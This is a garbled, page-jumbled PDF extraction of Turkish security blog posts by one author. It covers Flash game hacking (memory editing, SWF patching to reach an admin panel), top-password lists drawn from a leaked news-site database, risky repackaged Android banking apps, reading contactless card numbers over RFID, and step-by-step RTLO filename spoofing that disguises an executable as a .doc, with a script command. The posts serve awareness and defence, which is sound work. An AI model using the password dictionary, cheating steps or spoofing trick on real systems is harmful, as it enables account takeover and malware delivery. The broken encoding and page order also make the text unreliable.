aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 13: Hack 4 Career - 2011

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

